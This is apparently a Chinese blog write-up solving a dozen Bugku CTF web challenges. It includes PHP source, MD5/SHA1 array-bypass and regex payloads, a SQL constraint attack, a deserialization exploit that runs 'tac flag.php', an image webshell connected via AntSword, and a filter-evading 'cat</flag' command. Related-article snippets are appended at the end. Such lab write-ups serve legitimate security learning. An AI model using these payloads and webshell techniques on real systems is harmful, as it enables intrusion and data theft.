Bugku CTF web3

最新推荐文章于 2025-01-31 10:49:50 发布
最新推荐文章于 2025-01-31 10:49:50 发布
阅读量1k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 刷题 wp 文章标签: php ctf 安全 网络协议 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/124121725

目录

字符?正则?

前女友

Login1

你从哪里来

各种绕过呦

file_get_content( )

 安慰奖

文件上传

文件包含2

需要管理员

点login咋没反应

都过滤了

字符?正则?

<?php 
highlight_file('2.php');
$key='flag{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

trim()移除空白字符

这个文章超棒

 /key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

.                                  匹配除 "\n" 之外的任何单个字符

*                                 匹配它前面的表达式0次或多次,等价于{0,}

{4,7}                           最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7 个任意字符

\/                                匹配 / ,这里的 \ 是为了转义

[a-z]                           匹配所有小写字母

[:punct:]                     匹配任何标点符号

/i                                表示不分大小写

/?id=keyabckeyaaaaaakey:/a/keya!


前女友

翻出来源码

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

md5弱比较直接数组绕过

strcmp() 两个变量相等返回0,!strcmp($v3, $flag)要为真

可以通过报错返回0,数组和字符串无法比较,所以V3也传个数组

/?v1[]=1&v2[]=2&v3[]=3

Login1

hint:SQL约束攻击

基于约束的SQL攻击 - Angel_Kitty - 博客园

没有遇到过,了解一下原理

sql处理字符串时(一般是在比较字符串时),会自动删去末尾多余的空格,这是因为,SQL会在内部使用空格来填充字符串,以便在比较之前使其它们的长度保持一致。这一点,对于where和insert语句是成立的,对于like语句无效。

"admin"和"admin  “,最终都会得到"admin”,因此查询"admin "得到的结果是"admin"的信息

可以利用这个漏洞来绕过,方法:若注册时已知admin这个用户名存在,则我们可以注册admin(空格空格空格…)这个用户名,密码自定,然后登录时用刚刚注册的用户名和密码即可得到真实的想要的admin信息或权限。

用admin( 加空格 )当做用户名来注册

然后用admin登录

就能获得真正admin的信息,也就是拿到flag 

你从哪里来

抓包设置 Referer 成功, 开始设置User-agent 没出来

各种绕过呦

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

逻辑也简单, uname不等于passwd ,但他两的sha1值相等,sha1也可以数组绕过

file_get_content( )

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

主要就是file_get_contents()文件包含漏洞

/flag.txt 里面有内容: bugku

直接构造$ac=bugku,然后 $fn=flag.txt 读取到bugku 就成功了

?ac=bugku&fn=flag.txt

当然也可以自己构造一个文件出来用 php://input协议

 安慰奖

提示backups(备份)、试了一下常见备份路径 index.php.bak

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

还是比较简单的,只需绕过__wakeup() ,读取文件用tac 就行

构造序列化如下

<?php

class ctf
{
    protected $username = 'admin';
    protected $cmd = 'tac flag.php';
}

$a = new ctf();
$b = serialize($a);
$c = str_replace(':2:', ':3:', $b);
echo urlencode($c);

文件上传

大家都说这题很坑,参考大佬文章

【bugku】web32 文件上传_小 白 萝 卜的博客-CSDN博客

后缀改成php4,这样是顺利连接上蚁剑了 ,用jpg连不上

文件包含2

这分明文件上传

根据提示 根目录访问upload.php 

 上传我的图片马

直接成功了

要在这个地址访问,显示成功,然后就可以连蚁剑

http://114.67.175.224:15398/index.php?file=upload/202204131146376442.png

需要管理员

robots.txt

访问 ,看见这个ip想到伪造ip ,但这题没用,底下有个get传参

根据题目,肯定想到搞一个admin出来,?x=admin 就给flag 了 

/resusl.php?x=admin

点login咋没反应

还以为login前端有啥问题,试了一下也没发现

dirsearch扫了一遍也没啥

css文件有个提示 

 直接访问/?17310 ,给源码了

<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['17310'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>

条件也很简单

cookie传入序列化

都过滤了

  !,!=,=,+,^,-,% 像是只有这里的字符可以用

有个登录框,用admin ,bugkuctf登录进去 ,事实上是个sql盲注,有点麻烦看wp

WEB36,38:全都过滤了,你绝望吗(sql盲注)_不想带绿帽子的白帽子的博客-CSDN博客

Bugku WEB 都过滤了_显哥无敌的博客-CSDN博客_bugku 都过滤了

可以构造命令执行了 

这里查不到flag文件在哪里,只能是经验了,也许是在根目录下的flag

这里液过滤了空格 所以cat</flag

2021宁波市第四届网络安全大赛练习赛
Huamang的博客
05-23 853
签到咯~ 看响应头 Myself~ 请求头修改 php是……~ <?php include 'flag.php'; extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&
bugku ctf web8 (txt????)
qq_42777804的博客
08-02 737
进去网站 是如下的源码 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!<...
CTF-web3
Zhang_hongchao的博客
01-08 368
打开网址能看到以下信息: $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 代码的涵义, $what=$_GET['what']; //GET 方式获取参数what echo $what; //输出what 参数的值 if($what=='flag') //if 判断 $what 是否等于 flag echo'flag{****}'; 通过GET 方式(URL)获取一个参数,参数名是`what`。 直接提交
CTF-web-web3
三天不打上房揭瓦的博客
08-25 536
前言:小编也是现学现卖,方便自己记忆,写的不好的地方还请包涵,也欢迎各位大佬多多批评指正 网址:web-web3 1.进入网址可以看到一个弹框,先阻止弹框。 2.右键查看源代码,发现是js代码,alert函数的弹框。 3.划到最下面,发现一串 HTML 编码 4.打开bp 或者其它编码软件进行解码。我这里使用bp进行解码。 将后面三个l 去掉,得到flag为:KEY{J2sa42ahJK-HS11} ...
Bugku CTF web3Web
ChaoYue_miku的博客
02-14 297
0、打开网页,查看PHP源码 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 用GET方法上传参数what=flag即可 1、得到flag:flag{b201fba34aa17859887d45dc5b248bae}
BugkuCTF Web
2201_75891821的博客
07-30 2127
Bug ku CTF web
CTF BugKu平台—(Web篇①)_ctf bugku web
最新发布
2501_90392009的博客
01-31 1751
发现是一个一直在闪的页面 使用bp 抓包 发送到requencer --send 随便点几下在 到10.jpg 发现了flag。即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
BugKuCTF WEB
让我再浪一会 的博客
11-24 1036
文章目录BugKuCTF WEB一、web2二、计算器三、web基础$_GET四、web基础$_POST五、矛盾六、web3七、域名解析八、你必须让他停下九、变量1十、web5十一、头等舱十二、网站被黑十三、管理员系统十四、web4十五、flag在index里十六、输入密码查看flag BugKuCTF WEB 平台地址 一、web2 进入网页,查看源代码,在其中找到flag 二、计算器 进入网页,根据题目可得知需要输入运算结果,但限制了输入的数字的个数,查看网页的JS代码,将 maxlength =
CTF WEB基础】POST-Bugku CTF题解及知识点
yu_fly_fish的博客
08-03 734
一起变强!
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 7123
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
ctf-web3
gofreshman的博客
12-01 314
sql注入型题目
bugku ctf web3
qq_42777804的博客
08-12 902
这么一道题 打开后发现 一直是这两个界面                         花里胡哨   直接查看源代码(有的浏览器不可以 ,可以尝试一下 火狐)   发现最最后那一堆Unicode编码的注释可疑 &lt;!--&amp;#75;&amp;#69;&amp;#89;&amp;#123;&amp;#74;&amp;#50;&amp;#115;&amp;#...
BugkuCTFWeb--web3
VZZmieshenquan的博客
02-07 429
Description: flag就在这里快来找找吧 http://123.206.87.240:8002/web3/ Solution: 这题我先用鼠标连点器点完了所有对话框,发现页面还是空白。然后就查看页面源代码找到了HTML编码 直接Converter转换一下 Flag: KEY{J2sa42ahJK-HS11III} ...
ctfshow-WEB-web3
热门推荐
wangyuxiang946的博客
08-19 2万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
ctf.show web3
m0_63028223的博客
04-25 1650
打开题目,出现提示,php文件?,考虑文件包含漏洞。 输入参数:?url=/etc/passwd 这个报错界面出来了,说明存在文件包含漏洞 构造url值 =php://input 使用php协议 使用burp抓包 使用ls命令查看php下的文件 得到文件路径。。。。 使用cat方法查看 最终得到flag。。。。。。。。 发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...
论剑CTF web-3
m0_46587008的博客
10-25 424
1.web-3 进入环境,发现upload,点开看看 那就开始上传 根据回显推测应该是白名单,# 1.web-3 进入环境,发现upload,点开看看那就开始上传根据回显推测应该是白名单,比较难突破。但是看一眼URL发现有点小惊喜 http://123.206.31.85:10003/?op=upload 这里传进去的参数是op=upload,这个opload应该是一个文件名,推测这里可能是文件包含,在index.php中包含了upload文件才出现的这个上传界面。 2.思路 进入环境,发现u
bugkuctf——web3
weixin_40980428的博客
03-30 805
打开链接后一直出现弹框阻止弹框后出现一片空白页然后打开源代码发现一串经过unicode编码的数据解码后得到flag
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1785
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
10-ctf-web3
a1533759138的博客
07-14 196
10-ctf-web3
Bugku CTF WEB解题技巧分享与讨论
3. WEB题目解题方法 WEB题目涉及的常见漏洞包括但不限于:SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、SSRF服务器端请求伪造、文件包含、目录遍历、命令注入等。每种漏洞都有其特定的利用条件和方法。 - SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值